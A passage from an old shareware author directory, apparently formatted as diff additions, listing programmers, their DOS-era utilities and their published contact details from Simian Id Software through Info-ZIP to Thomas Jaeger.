+Company: Simian Id Software +Email: BITNET: C08922DB@WUVMD +WWW: +Address: P.O. Box 430011, St. Louis, Mo. 63143, USA +Voice: (314) 781-8709 +BBS: +Fax: +Other info: TSR version for registered users. + + +Key: Breuer, Richard +Author: Richard (Ricki) Breuer +Program: RUTILS several DOS utilities +Company: ComConsult Kommunikationstechnik GmbH +Email: ricki@pool.informatik.rwth-aachen.de +WWW: +Address: Pascalstrasse 25, 5100 Aachen, Germany, Europe +Voice: +49 2408 149118 +BBS: +Fax: +49 2408 149149 +Other info: + + +Key: Bridges, John +Author: John Bridges +Program: VGAKIT SVGA Programming Kit (freeware) +Company: +Email: 75300.2137@compuserve.com +WWW: +Address: 2810 Serang Place, Costa Mesa, Ca. 92626, USA +Voice: +BBS: +Fax: +Other info: is the author of GRASP published by Paul Mace Software + + +Key: Brown, David +Author: David Brown +Program: MDB - Music Database/Tape Layout +Company: St.Mary's University, Math/Comp.Sci. Dept. +Email: dbrown@husky1.stmarys.ca, dbrown@shark.stmarys.ca +WWW: +Address: Halifax, NS, Canada B3H 3C3 +Voice: (902)420-5893 +BBS: +Fax: (902)420-5266 +Other info: + + +Key: Brown, Keith S. +Author: Keith S. Brown +Program: KPPF (Keith's Preferred Pascal Format) +Company: NASA/JSC/ES64 +Email: brownk@samnet.jsc.nasa.gov +WWW: +Address: Houston, TX 77058 (USA) +Voice: 713-483-8952 +BBS: +Fax: 713-486-2162 +Other info: Builds tools (mostly MechEng or Software) + + +Key: Brown, Ralf +Author: Ralf Brown +Program: MS-DOS Interrupt List; SPAWNO spawn() replacement +Company: +Email: ralf@telerama.lm.com +WWW: +Address: 813 Copeland Way Suite 26, Pittsburgh, PA 15232, USA +Voice: +BBS: +Fax: +Other info: Also distributes a number of DESQview-aware programs + + +Key: Bruce, Robert +Author: Robert (Bob) Bruce +Program: Msdos/Windows/Mac/Amiga/Unix CD-ROMs (incl SIMTEL20, Garbo) +Company: Walnut Creek CDROM +Email: rab@cdrom.com +WWW: +Address: 1547 Palos Verdes Mall, Suite 260, Walnut Creek, CA 94596, USA +Voice: +1 510 947-5996 / +1 800 786-9907 Toll Free (US/Can only) +BBS: +Fax: +1 510 947-1644 +Other info: Many CDROM titles available. Phone/Fax/email for free catalog. + + +Key: Brucker, Fred P. +Author: Fred P. Brucker +Program: {COMMO} High performance telecomm program +Company: New Standard Software +Email: 71021.356@compuserve.com +WWW: +Address: P.O. Box 141537, Columbus, OH 43214, USA +Voice: (614) 326-1309 +BBS: (718) 444-4555 +Fax: +Other info: + + +Key: Brzezinski, Andrzej +Author: Andrzej Brzezinski +Program: VED - Vision Edit text editor with mouse support +Company: University of Manitoba +Email: umbrzez0@silver.cs.umanitoba.ca +WWW: +Address: 308-70 Garry St., Winnipeg, MB, R3C 3J9, CANADA +Voice: (204) 943-4020 +BBS: +Fax: +Other info: + + +Key: Buerg, Vernon +Author: Vernon D. Buerg +Program: LIST A File Viewing and Browsing Utility +Company: +Email: 70007.1212@compuserve.com +WWW: +Address: 139 White Oak Circle, Petaluma, CA 94952, USA +Voice: +BBS: (707) 778-8944, (707) 778-8841, (415) 994-2944 +Fax: (707) 778-8728 For orders only +Other info: + + +Key: Burfitt, Kevin +Author: Kevin (Zaph) Burfitt +Program: Cthugha - Oscilliscope on Acid for SB/GUS (Audio Visual) +Company: Torps Productions +Email: zaph@torps.apana.org.au +WWW: +Address: P.O. Box 331, Richmond 3121, Melbourne, Australia +Voice: (not published) +BBS: +613-813-3688 +Fax: (not published) +Other info: + + +Key: Burke, Christopher +Author: Christopher (Chris) Burke +Program: TurboVision in Graphics mode (Pas/C++) +Company: MindWare +Email: clb@prism.mindware.brisnet.org.au +WWW: +Address: P.O. Box 1247, Carindale, Qld, 4152, Australia +Voice: +61-7-398-4000 +BBS: +61-7-398-4200 +Fax: +61-7-398-4200 +Other info: Fidonet 3:640/307 + + +Key: Button, Jim +Author: Jim Knopf (formerly aka Jim Button) +Program: PC-File, buttonFile, NEWPAPER, Medley, PC-Calc +Company: formerly ButtonWare, Inc. +Email: jknopf@ix.netcom.com +WWW: +Address: +Voice: +BBS: +Fax: (206)836-0633 +Other info: The "Father of Shareware". Retired. + Founding member of ASP and its first chairman. + + +Key: Caine, Tony +Author: Tony Caine +Program: 2COL/JETCOL 1-6 column copmressed print for all printers +Company: ARCaine Technology +Email: arcaine@holonet.net, 72614.1451@compuserve.com +WWW: +Address: 960 Neilson St, Albany, CA 94706, USA +Voice: (510) 527-9859 +BBS: +Fax: +Other info: + + +Key: Camp, David +Author: David J. Camp +Program: mailbin +Company: +Email: david%campfire@wupost.wustl.edu +WWW: +Address: 6103 Charlotte Avenue, St. Louis, MO 63120-1201 +Voice: +1 314 382 0584 +BBS: +Fax: +Other info: last release is called xxinstal.bat + + +Key: Carapetis, Paul +Author: Paul Carapetis +Program: PCPS Postscript printing program for DOS and OS2 +Company: MicroSource +Email: Paul_Carapetis@au.wang.com +WWW: +Address: 102 Allister Ave, Knoxfield, Australia, 3180. +Voice: 61-3-7632424 +BBS: +Fax: +Other info: Also author of MicroSource utilities (MSUTILxx.ZIP) + + +Key: Carlyle, Jeffrey +Author: Jeffrey Carlyle +Program: comp.os.msdos.programmer FAQ +Company: Perplexic Software +Email: Jeffrey.Carlyle@BGAMUG.COM +WWW: +Address: 297 Meadowlark Trail, Bowling Green, KY 42101 USA +Voice: +1 502 781-7884 +BBS: +1 502 843-2120 +Fax: +Other info: + + +Key: Carter, Simon +Author: Simon A. Carter +Program: LAUNCH PC menu,mouse/short cuts/help/multi-user/security +Company: Crystal Software +Email: simonc@bruce.cs.monash.edu.au +WWW: http://www.cs.monash.edu.au/~simonc +Address: 14 Canterbury Rd, Heathmont, Victoria 3135, AUSTRALIA +Voice: +61-3-9720-8558 +BBS: +Fax: +61-3-9729-8836 +Other info: Latest version of Launch available from WWW home page + + +Key: Centanni, Nicholas +Author: Nicholas Centanni +Program: Night Bird, 3D animation screen saver of Bird in Flight +Company: Magnum Opus Studios +Email: nickc@netcom.com +WWW: +Address: 15466 L.G. Blvd., Suite 109-060, Los Gatos, CA 95032 USA +Voice: (408) 236-2264 +BBS: +Fax: +Other info: + + +Key: Chin, John +Author: J.R. Lee Chin (John) +Program: GIF Commentor v1.1 +Company: SoftView +Email: psjrl@wombat.newcastle.edu +WWW: +Address: P.O. Box 35, Cooranbong 2265 N.S.W. Australia +Voice: 61-49-215077 +BBS: +Fax: +Other info: + + +Key: Chinook Software +Author: Chinook Software +Program: ATK Analyst's Tool Kit (data flow diagrams) +Company: Chinook Software +Email: mschwart@nyx.cs.du.edu +WWW: +Address: P. O. Box 24536, Denver, Colorado 80224, USA +Voice: +BBS: +Fax: +Other info: Email contact: Michael Schwartz + + +Key: Clarke, Daryl +Author: Daryl Clarke +Program: NewPet - Geochemical/Igneous Petrology Modelling Program +Company: Memorial Univ. of Nfld., Dept. of Earth Sciences +Email: daryl@garfield.cs.mun.ca +WWW: +Address: St.John's, NF, A1B 3X5, Canada +Voice: (709) 737 8346 or 737 8142 +BBS: +Fax: (709) 737 2589 +Other info: FTP site - sparky2.esd.mun.ca (134.153.11.101) + + +Key: Coast to Coast +Author: Coast to Coast Telecommunications, Inc. +Program: MS-DOS/Windows CD-ROM (SimTel Software Repository) +Company: Coast to Coast Telecommunications, Inc. +Email: cdrom@Mail.Coast.NET +WWW: WWW Info and Forms Interface: http://www.coast.net/SimTel/ +Address: 5850 Dixie Highway, Clarkston, MI 48346, U.S.A. +Voice: (800) 536-3373 (toll free, U.S.A./Canada) or (810) 623-6700 +BBS: +Fax: (810) 623-1469 +Other info: + + +Key: Collins, Adrian +Author: Adrian (Ade) Collins +Program: QT-QUOTE Versatile Fortune Cookie Program +Company: +Email: ade@mcc.ac.uk +WWW: +Address: 70 Broad Oak Lane, Didsbury, Manchester M20 0GG, UK +Voice: (daytime) +44 61-275-6009 (home) +44 61-434-3484 +BBS: +Fax: +44 61-275-6040 +Other info: + + +Key: Colucci, Michael +Author: Michael Colucci +Program: The Invoice Store 3.1 +Company: Software Store Products, Inc. +Email: SoftwStore@aol.com +WWW: +Address: PO Box 562, Oakdale, NY 11769, USA +Voice: (516)244-6927 +BBS: (516)589-4984 +Fax: (516)567-5563 +Other info: + + +Key: Conrad, David +Author: David (Dave) Conrad +Program: XSUM checksumming utilities +Company: Moore Computing +Email: ab411@detroit.freenet.org +WWW: +Address: 432 Alter Rd., Detroit, MI 48215-3105, USA +Voice: (313) 824-6111 +BBS: +Fax: +Other info: David_Conrad@mts.cc.wayne.edu address is defunct + + +Key: Corbier, Daniel +Author: Daniel Corbier +Program: Ucalc, Ultimate Calculator, math expression evaluator +Company: +Email: corbier@delphi.com +WWW: +Address: 11670 Ne 20th Drive, Miami FL 33181, USA +Voice: +BBS: +Fax: +Other info: Finger corbier@andrews.edu for up-to-date info on Ucalc + + +Key: Coyote Data +Author: Coyote Data, Ltd. +Program: MS-DOS/Windows CD-ROM (SIMTEL20) +Company: Coyote Data, Ltd. +Email: 71756.444@CompuServe.COM or CIS 71756,444 +WWW: +Address: 1142 N. Main, Rochester, MI 48307, USA +Voice: (800) 451-7093 (toll free) or (313) 656-8265 +BBS: +Fax: (313) 651-4071 +Other info: Phone, email, or FAX for additional information. + + +Key: Datawatch +Author: Datawatch +Program: Virex Anti-Viral Program for the PC +Company: Datawatch Corporation +Email: info@datawatch.com +WWW: +Address: 3700 Lyckan Parkway, Durham, NC 27707 USA +Voice: (919) 490-1277 +BBS: (919) 419-1602 +Fax: (919) 490-6672 +Other Info: All Datawatch Products are available retail as well. + + +Key: Davies, Robert +Author: Robert Davies +Program: newmat07: a matrix manipulation library for C++ +Company: RDMC +Email: robertd@kauri.vuw.ac.nz +WWW: +Address: 16 Gloucester Street, Wilton, Wellington, New Zealand +Voice: +BBS: +Fax: +Other info: + + +Key: Davis, Gayle +Author: Mr. Gayle Davis +Program: SWAG (Sourceware Archival Group) +Company: NONE +Email: 72067.2726@compuserve.com +WWW: +Address: +Voice: (219) 875-8811 +BBS: (219) 875-8133 +Fax: N/A +Other Info: SWAG is a huge library of PASCAL snippets collected + from PC networks worldwide. + + +Key: Dell, Thomas +Author: Thomas E Dell +Program: Waffle - WAFxxx.ZIP +Company: Darkside International +Email: dell@vox.darkside.com +WWW: +Address: PO Box 4436, Mountain View CA 94040 USA +Voice: +BBS: 1-(408) 245-SPAM +Fax: +Other info: + + +Key: Derbyshire, Andrew +Author: Andrew H. Derbyshire +Program: UUPC/extended - E-mail for DOS, OS/2, and Windows/NT +Company: Kendra Electronic Wonderworks +Email: help@kew.com +WWW: +Address: P.O. Box 132, Arlington, MA 02174-0002 USA +Voice: 617-641-3739 +BBS: 617-641-4817 (anonymous UUCP; send mail to help@kew.com) +Fax: +Other info: Prime internet archive is ftp.clarkson.edu + + +Key: Derr, James +Author: James (Jim) Derr +Program: SHEZ Compression Companion +Company: California Software Design +Email: jim.derr@spacebbs.com, 76266.2634@compuserve.com +WWW: +Address: P.O. Box 15248, Santa Rosa, Ca. 95402, USA +Voice: (707) 575-9868 +BBS: (707) 538-8710 +Fax: +Other info: + + +Key: Dhesi, Rahul +Author: Rahul Dhesi +Program: ZOO manipulate archives of files in compressed form +Company: +Email: dhesi@cirrus.com +WWW: +Address: +Voice: +BBS: +Fax: +Other info: + + +Key: Dickson, Mike +Author: Mike Dickson +Program: PANTHER Communications Software +Company: Black Cat Software Factory +Email: mike.dickson@almac.co.uk +WWW: +Address: 10 Stoneybank Terrace,Musselburgh,Midlothian,SCOTLAND,EH216NL +Voice: 031-653-6124 +BBS: +Fax: 031-653-6124 +Other info: + + +Key: Dight, David +Author: David L. Dight +Program: XED A Unique HEX/Binary File Editor +Company: +Email: davidd@interconnect.com.au, 100033.2563@compuserve.com +WWW: +Address: PO Box 280, Kings Cross N.S.W. 2011 AUSTRALIA +Voice: +61 2 331 4521 +BBS: +Fax: +61 2 233 2929 +Other info: + + +Key: DiVecchio, Mark +Author: Mark DiVecchio +Program: PC-VT VT100/4014 PC Based Terminal Emulator +Company: Athena Systems Development Group +Email: markd@silogic.uucp +WWW: +Address: 9888 Carroll Center Road Suite 113, San Diego, CA 92126 USA +Voice: (619) 549-9841 +BBS: (619) 549-3927 +Fax: (619) 549-9833 +Other info: Also the Author of LPTx, A Line Printer Capture Program + + +Key: Dobb's, Journal +Author: Dr. Dobb's Magazine +Program: Dr. Dobb's Magzine articles +Company: +Email: 76704.50@CompuServe.COM +WWW: +Address: +Voice: +BBS: Dr. Dobb's BBS +Fax: +Other info: + + +Key: Duby, Philippe +Author: Philippe Duby +Program: DKI disk analyser +Company: Alter Ego +Email: duby@zen.dedal.fr.net, 73551,1561@compuserve.com +WWW: +Address: 7 Rue Jules Valles, 69100 Villeurbanne, France +Voice: (33) 78.24.47.71 +BBS: +Fax: (33) 78.52.47.76 +Other info: + + +Key: Doupnik, Joe +Author: Prof. Joe R. Doupnik of Utah State University +Program: MsKermit +Company: Kermit Distribution, Columbia University Center for + Computing Activities, New York, USA +Email: jrd@cc.usu.edu +WWW: +Address: +Voice: +BBS: +Fax: +Other info: + + +Key: Duentsch, Ivo +Author: Ivo Duentsch +Program: Numbers, a utility for number theoretical functions +Company: Universitaet Osnabrueck +Email: duentsch@triton.rz.uni-osnabrueck.de +WWW: +Address: Rechenzentrum, 49069 Osnabrueck, Germany +Voice: (+49) 541 - 969 2346 +BBS: +Fax: (+49) 541 - 969 2470 +Other info: + + +Key: Dumdei, Mike +Author: Mike Dumdei +Program: TXZM Zmodem Driver, MCOMM Async Lib +Company: MCOMM Software +Email: mdumdei@darkstar.swsc.k12.ar.us, mdumdei@aol.com +WWW: +Address: 6 Holly Lane, Texarkana, TX 75503, USA +Voice: 903-838-8307 +BBS: 903-838-6713 +Fax: +Other info: + + +Key: Durward, Jon +Author: Jonathan G. Durward +Program: Hex Binary File Editor (with mouse support) +Company: JD Software +Email: jgdurwar@uwaterloo.ca +WWW: +Address: 258 Lester St, Waterloo, Ontario, Canada, N2L 3W5 +Voice: (519) 884-9749 +BBS: +Fax: +Other info: + + +Key: Edwards, Larry +Author: Larry T. Edwards +Program: 4FILES file manager, annotator & launcher for 4DOS/NDOS +Company: Hand-Crafted Software +Email: 72037.3607@compuserve.com +WWW: +Address: Box 6001, Sitka, Alaska 99835 USA +Voice: (907) 747-8996 +BBS: +Fax: (907) 747-4801 +Other info: + + +Key: Efros, Alexei +Author: Alexei (Alyosha) Efros +Program: Melody Master - music editor & programming tool +Company: +Email: efros@peruvian.cs.utah.edu +WWW: http://www.cs.utah.edu/~efros +Address: 1125 E. 200 S. #2, Salt Lake City, Utah 84102, USA +Voice: (801) 531-9320 +BBS: +Fax: +Other info: + + +Key: Elber, Gershon +Author: Gershon Elber +Program: GIFLIB, IRIT solid modeller, EEDRAW EE drawing package. +Company: +Email: gershon@gr.cs.utah.edu +WWW: +Address: #918 university village, S.L.C., UT 84108, USA +Voice: (801) 582-1807 +BBS: +Fax: +Other info: + + +Key: Engelmann, Eric +Author: Eric Engelmann +Program: Technical Shareware CDROMs and Directories +Company: EMS Professional Shareware +Email: eengelmann@worldbank.org +WWW: http://www.paltech.com/ems/ems.htm +Address: 4505 Buckhurst Ct., Olney MD 20832-1830, USA +Voice: +1(301)924-3594 +BBS: +1(301)774-1486 +Fax: +1(301)774-1486 +Other info: + + +Key: Eradus, Richard +Author: Richard Eradus +Program: TGIF graphical file viewer (gif/pcx/bmp/fli) +Company: Tashcom software +Email: Rpe@euronet.nl / rpe@dds.nl +WWW: +Address: Dahliastraat 66e, 3073 BE , Rotterdam, The Netherlands +Voice: +31-10-4845295 +BBS: Maasstad bbs +31-10-4862184 +Fax: +Other info: + + +Key: Evsikov, Igor +Author: Igor Ivanovich Evsikov +Program: RSC Resident Scientific Calculator +Company: Join Institute of Nuclear Research +Email: evsikov@lcta5.jinr.dubna.su +WWW: +Address: P.O. Box 79, Head Post Office Moscow 101000 Russia +Voice: (221) 4-52-09 +BBS: +Fax: +Other info: + + +Key: Farfan, Daniel +Author: Daniel (Dan) Farfan +Program: The Sound Board V2. Software for the EYES & EARS +Company: Automated Education, Inc. +Email: p00249@psilink.com +WWW: +Address: PO BOX 42284 Phoenix, AZ 85080-2284 USA +Voice: (602) 973-2790 +BBS: +Fax: +Other info: Download 1sboard2.zip for info. about 1-Levelware! + + +Key: Faulks, Neil +Author: Neil Faulks +Program: E4 - Protean Text Editor +Company: +Email: neil@dcs.kcl.ac.uk +WWW: +Address: 28 Clickett Hill, Basildon, Essex, England, UK. SS14 1NW +Voice: +44 71 873 2007 +BBS: +Fax: +Other info: + + +Key: Feldmann, Harald +Author: Harald Feldmann +Program: HAP (R) 3.00 Archiver by Hamarsoft (R) +Company: Hamarsoft (R) +Email: harald.feldmann@almac.co.uk +WWW: +Address: P.o. box 451, 6400 AL Heerlen, The Netherlands +Voice: NOT PUBLIC, please send e-mail if you want it private. +BBS: +Fax: +Other info: New release 3.14e is available for registered users + + +Key: Forsberg, Chuck +Author: Chuck Forsberg +Program: ZMODEM +Company: Omen Technology Inc +Email: caf@omen.COM, 70007.2304@compuserve.com +WWW: +Address: Post Office Box 4681, Portland OR 97208-4681, U.S.A. +Voice: 503-621-3406 +BBS: 503-621-3746 +Fax: 503-621-3735 +Other info: + + +Key: Foy, Jeffery +Author: Jeffery (Jeff) Foy +Program: QWK2TXT - Converts QWK mail packets to ASCII text +Company: Jiffy Software +Email: jfoy@glia.biostr.washington.edu +WWW: +Address: 14509-8th N.E., Seattle, WA 98155-6945, USA +Voice: (206) 362-8158 +BBS: (206) 939-7876 +Fax: +Other info: + + +Key: Franchi, Maurizio +Author: Maurizio Franchi +Program: PROFinance, complete financial calculations program +Company: +Email: maurizio.franchi@galactica.it +WWW: +Address: Casella Postale 24, 25075 Nave, BRESCIA, Italy +Voice: +BBS: +Fax: +Other info: + + +Key: Frandsen, Jesper +Author: Jesper Frandsen +Program: PCXDUMP. TSR screen capture. +Company: +Email: jesperf@daimi.aau.dk +WWW: +Address: c/o B. Frandsen, Duedalen 1, 5492 Vissenbjerg, DENMARK. +Voice: 009-45-86195460 +BBS: +Fax: +Other info: + + +Key: Freiss, Martin +Author: Martin Freiss +Program: PCElm Mail user agent for NOS, UUPC, or other MTAs +Company: private +Email: freiss.pad@sni.de +WWW: +Address: Muehlenfloessstr. 60, D-W4792 Bad Lippspringe, Germany +Voice: +BBS: +Fax: +Other info: + + +Key: Fubar Systems +Author: Christopher J. Ambler +Program: FSUUCP communication utility +Company: Fubar Systems +Email: cambler@zeus.calpoly.edu, chris@fubarsys.com +WWW: +Address: 1344 Madonna Road, Suite 242, San Luis Obispo, Ca, 93405 USA +Voice: (805) 542-0336 +BBS: (805) 53-FUBAR (543-8227) +Fax: +Other info: + + +Key: Gadegast, Frank +Author: Frank Gadegast +Program: GNU-DOS-port of the SECMPEG-security-utility for MPEG +Company: PHADE Software +Email: phade@contrib.de +WWW: +Address: Leibnizstr. 30, 10625 Berlin, GERMANY +Voice: (030) 312 81 03 +BBS: +Fax: (030) 312 81 03 Fax only part-time available !!! +Other info: Archivename: mpeg2p11.zip + + +Key: Gallias, Michael +Author: Michael Gallias +Program: Mod Editor and Units for Borland Pascal +Company: +Email: gallias@iafrica.com +Address: P O Box 51231, Musgrave Road, 4062, South Africa +Voice: +BBS: +Fax: +Other info: + + +Key: Garcia, Ciriaco +Author: Ciriaco Garcia de Celis +Program: 2M high capacity diskette format application +Company: +Email: ciri@gui.uva.es, Fidonet 2:341/21.8 +WWW: +Address: C/Renedo, 2, 4-C; 47005 Valladolid; Spain +Voice: +BBS: +34 -83 -307574 (16k8) +Fax: +Other info: + + +Key: Geeslin, Robert +Author: Robert Geeslin +Program: TIGER TRANSFER reads Census TIGER/Line & creates MapInfo +Company: OSU-COM +Email: GEESLIN@VMS.OCOM.OKSTATE.EDU +WWW: +Address: Clinic Bldg, 2345 Southwest Blvd, Tulsa, OK 74107, USA +Voice: 918-582-2681x205 +BBS: +Fax: +Other info: Creates MBI files for MapInfo Import Utility (required) + + +Key: Geiser, Wayne +Author: Wayne Geiser +Program: On This Day - What happened on this day in history? +Company: The Software Construction Co. +Email: softcons@world.std.com 70313.3615@compuserve.com +WWW: +Address: PO Box 160, N Billerica, MA 01862-0160 USA +Voice: (508) 851-6204 +BBS: +Fax: +Other info: [ASP] also authored Diamond Data (baseball stats) + + +Key: Gillett, Dave +Author: Dave Gillett +Program: Reuter Connect - VT-100 comms w/scripts and macros +Company: Reuters, and privately +Email: dgil@ipsaint.ipsa.reuter.com OR dgil@pa.reuter.com +WWW: +Address: 3790 El Camino Real #231, Palo Alto, CA 94306, USA +Voice: (415)327-1700 +BBS: +Fax: (415)327-0146 +Other info: C++ and TP5 + + +Key: Green, J Paul +Author: J Paul Green +Program: PROTECT Software protection programs +Company: G-Force Computer Systems +Email: jpgreen@easylink.ieunet.ie +WWW: +Address: Hill House, Donnybrook, Douglas, Co Cork, IRELAND +Voice: +353 21 894950 +BBS: +Fax: +353 21 894924 +Other info: + + +Key: Greenberg, Ross +Author: Ross Greenberg +Program: VIRX Easy to use free virus scanner +Company: Microcom, Inc. +Email: 72461.3212@compuserve.com +WWW: +Address: +Voice: +BBS: (919) 419-1602 v.32bis +Fax: +Other info: + + +Key: Gregory, Randy +Author: Randy S. Gregory +Program: PRO-KEYS: An innovative new cmd line environment. +Company: +Email: RANDY@ae.agecon.wisc.edu +WWW: +Address: 1717 Simpson St. Apt. #217, Madison, Wisconsin, 53713, USA +Voice: (608) 223-8907 +BBS: +Fax: +Other info: + + +Key: Gresseth, Reidar +Author: Reidar Gresseth, Chris Hook +Program: Explosiv Screen Saver +Company: Hook and Gresseth Software +Email: gresseth@ucs.ubc.ca +WWW: +Address: P.O. Box 3013, Vancouver, B.C., V6B 3X5, Canada +Voice: (604) 277-8914 or (604) 738-0045 +BBS: +Fax: +Other info: + + +Key: Guthrie, Bruce +Author: Bruce Guthrie +Program: Guthrie utilities including READ +Company: U.S. Department of Commerce, and Wayne Software +Email: bgu@cu.nih.gov +WWW: +Address: 113 Sheffield St., Silver Spring, MD 20910, USA +Voice: (202) 482-3234 +BBS: +Fax: (301) 588-8986 +Other info: Variety of usually free utilities + + +Key: Gutmann, Peter +Author: Peter Gutmann +Program: HPACK multi-system archiver +Company: +Email: pgut1@cs.aukuni.ac.nz +WWW: +Address: 24 Durness Place, Orewa, North Auckland, New Zealand +Voice: +64 9 426-5097 +BBS: +Fax: +Other info: + + +Key: Hahn, Karl +Author: Karl Hahn +Program: MIME64 A MIME base64 encoder/decoder +Company: Loral Data Systems +Email: hahn@lds.loral.com +WWW: +Address: 5630 Sawyer Circle, Sarasota, Florida 34233 USA +Voice: 813 371-0811 X5334 813 922-5578 +BBS: +Fax: 813 378-6773 +Other info: + + +Key: Hakim, Andy +Author: Andy Hakim +Program: Precise Point: "graphical" text-mode mouse driver +Company: none +Email: ahakim@uh.edu +WWW: +Address: P.O. Box 70392, Houston, TX 77270, USA +Voice: (713) 880-3059 +BBS: (713) 961-1604 (Sands PCB) +Fax: +Other info: + + +Key: Hamel, David +Author: David Hamel +Program: Boxer: full-featured text editor for programmers/writers +Company: Boxer Software +Email: 70242.2126@compuserve.com +WWW: +Address: PO Box 3230, Peterborough, NH 03458-3230, U.S.A. +Voice: 603-924-6602 +BBS: 603-924-3859 +Fax: 603-924-4471 +Other info: Boxer is available for both DOS and OS/2 + + +Key: Hargreaves, Shawn +Author: Shawn Hargreaves +Program: FED folding text editor +Company: none +Email: slh100@tower.york.ac.uk +WWW: +Address: 1 Salisbury Road, Market Drayton, Shropshire, England +Voice: (england) 0630 654346 +BBS: +Fax: +Other info: + + +Key: Harris, Mark +Author: Mark Harris +Program: Ample Notice appointments, alarm, PIM +Company: Granny's Old-Fashioned Software +Email: mh@cs.appstate.edu +WWW: +Address: Rt 4, Box 216, Boone, NC 28607 USA +Voice: (704) 264-6906 +BBS: +Fax: (704) 264-4634 +Other info: + + +Key: Hart, Michael +Author: Michael S. Hart +Program: Project Gutenberg Electronic Texts +Company: Illinois Benedictine College (USA) +Email: hart@vmd.cso.uiuc.edu or hart@uiucvmd +WWW: +Address: IBC, 5700 College Road, Lisle, IL 60532-0900 USA +Voice: (217) 344-0367 +BBS: (503) 620-0307 or (408) 378-5108 +Fax: +Other info: email listserv@uiucvmd or listserv@vmd.cso.uiuc.edu + to receive newsletters. Send "sub gutnberg your name" + + +Key: Hass, Jim +Author: Jim Hass +Program: HDM - Hard Disk Menu & Security System for DOS & Networks +Company: MicroFox Company +Email: 73057.3113@compuserve.com +WWW: +Address: PO Box 447, Richfield OH 44286-0447, USA +Voice: (216) 659-9489 +BBS: (216) 661-9065 +Fax: (216) 659-9489 +Other info: Other products available. + + +Key: Heino, Kim +Author: Kim Heino, Tapani T. Salmi +Program: BBBS, Bulletin Board System for MS-DOS +Company: Oy Julo Systems Ltd +Email: Kim.Heino@utu.fi +WWW: +Address: Paavolankatu 3 D 34, FIN-20240 TURKU +Voice: +358 21 240 1513 +BBS: +358 21 240 4036 +Fax: +Other info: + + +Key: Hilbig, Erhard +Author: Erhard Hilbig +Program: CONEX Terminal emulation program +Company: Universitaet-Gesamthochschule Paderborn +Email: zahilb@pbhrzt.uni-paderborn.de +WWW: +Address: Uni Paderborn, Postfach 1621, 4790 Paderborn, Germany +Voice: 05251/60-2433 +BBS: +Fax: 05251/60-3207 +Other info: + + +Key: Hogstrom, Jonas +Author: Jonas Hogstrom +Program: A3E, Ansi Ascii Avatar Editor +Company: JH SoftService +Email: c91jonho@und.ida.liu.se +WWW: +Address: Kunsbergsgatan 8c, S-582 53 Linkoping, Sweden +Voice: +46-13-122636 +BBS: FidoNet 2:204/408.3 +Fax: +46-21-350524 +Other info: + + +Key: Holin, Michael +Author: Michael E Holin +Program: PC-CONFIG V6.45, systeminfo / benchmarkprg. for DOS +Company: +Email: m.holin@mib.central.de +WWW: +Address: PO.Box 1146, 38678 Clausthal, Germany +Voice: +49 5323 3350 +BBS: +49 5323 84130 +Fax: +49 5323 3380 +Other info: + + +Key: Homrighausen, Joaquim +Author: Joaquim Homrighausen +Program: FrontDoor E-Mail package +Company: Absolute Solutions +Email: joho@abs.lu, 2:270/17@fidonet +WWW: +Address: 389, route d'Arlon / L-8011 Strassen / Luxembourg +Voice: +BBS: +352 316702 (ZyXEL), +352 318766 (HST/V32Terbo) +Fax: +352 316702 +Other info: + + +Key: Hovila, Ari +Author: Ari Hovila / Jari Perkiomaki +Program: WLIST Word frequency counter +Company: University of Vaasa +Email: ajh@uwasa.fi +WWW: +Address: P.O.Box 700, FIN-65101 Vaasa, Finland +Voice: +358-61-3248 389 +BBS: +358-61-3170 972 Walli BBS (domestic only) +Fax: +358-61-3248 380 +Other info: garbo.uwasa.fi FTP site moderator (MS-DOS, Windows) + + +Key: Hu, Franklin +Author: Franklin Hu +Program: PC-Proof professional grammar checking program +Company: Intellect Systems +Email: 72630.3457@compuserve.com +WWW: +Address: P.O. Box 58213, Renton, WA 98058, USA +Voice: (206) 226-0429 +BBS: +Fax: +Other info: + + +Key: Hu, Tsung +Author: Tsung Hu +Program: Telemate, GIFLink, GIFLITE, MusicalGIF, MuchMusic +Company: White River Software +Email: 72070.3515@compuserve.com +WWW: +Address: P.O.Box 73031, Hamilton, Ont. L9A 5H7, Canada +Voice: +BBS: (503)297-0626 +Fax: +Other info: + + +Key: Huang, Weiguang +Author: Dr Weiguang Huang +Program: SymbMath: Symbolic Math software +Company: University of New South Wales +Email: sc9300078@cumulus.csd.unsw.edu.au, w.huang@unsw.edu.au, + huang@deakin.oz.au +WWW: +Address: Dept. of Analytical Chemistry, University of New South Wales, + Kensington, NSW 2033, Australia +Voice: 61-2-697-4643 +BBS: +Fax: 61-2-662-2835 +Other info: + + +Key: Huseby, Sverre H. +Author: Sverre H. Huseby +Program: DOSED cmd line editor, XDSKCPY diskcopy without swapping +Company: +Email: sverrehu@ifi.uio.no +WWW: +Address: Bjoelsengt. 17, N-0468 Oslo, Norway +Voice: +47 22 23 05 39 +BBS: +Fax: +Other info: + + +Key: Iakovlev, Alex +Author: Alex F. Iakovlev, Ph.D. +Program: MULTIGRAPH-2 Graphics Library for Modula-2 Language +Company: Computing Center of Russian Academy of Sciences +Email: iak@sms.ccas.msk.su +WWW: +Address: 40, Vavilov Street, Moscow, 117967, Russia +Voice: (7-095) 135-1340 +BBS: +Fax: (7-095) 135-6159 +Other info: + + +Key: Info-ZIP +Author: Greg Roelofs, Mark Adler, Jean-loup Gailly (et al) +Program: zip and unzip for Unix, MS-DOS, and other platforms +Company: +Email: zip-bugs@wkuvx1.wku.edu +WWW: +Address: +Voice: +BBS: +Fax: +Other info: Info-ZIP Group, a mailing list moderated by Hunter + Goatley. Send the line HELP to listserv@wkuvx1.wku.edu + for information on subscription to the info-zip mailing + list. + + +Key: Isaacson, Eric +Author: Eric Isaacson +Program: A86 assembler, ZIPKEY zipcode directory +Company: Eric Isaacson Software +Email: 71333.3154@compuserve.com +WWW: +Address: 416 E. University Ave., Bloomington IN 47401-4739 USA +Voice: 1-812-339-1811 +BBS: +Fax: +Other info: + + +Key: Jackson, Lee +Author: Lee Jackson +Program: The Hack Report +Company: +Email: ljackson@mdf.fidonet.org +WWW: +Address: 130 Dove Lane, Kyle, TX 78640, USA +Voice: (512) 295-3923 +BBS: +Fax: +Other info: + + +Key: Jaeger, Thomas +Author: Thomas Jaeger +Program: ACZAR - "The Ultimate Archive Shell" +Company: CZAR Software +Email: 71031.3613@compuserve.com, czarsoft@aol.com +WWW: +Address: P.O. Box 370087, El Paso, TX 79937-0087, USA +Voice: 915-595-8787 +BBS: 915-595-8705 +Fax: 915-595-8787 +Other info: Fido: 1:381/99 + + +Key: Jennings, Peter +Author: 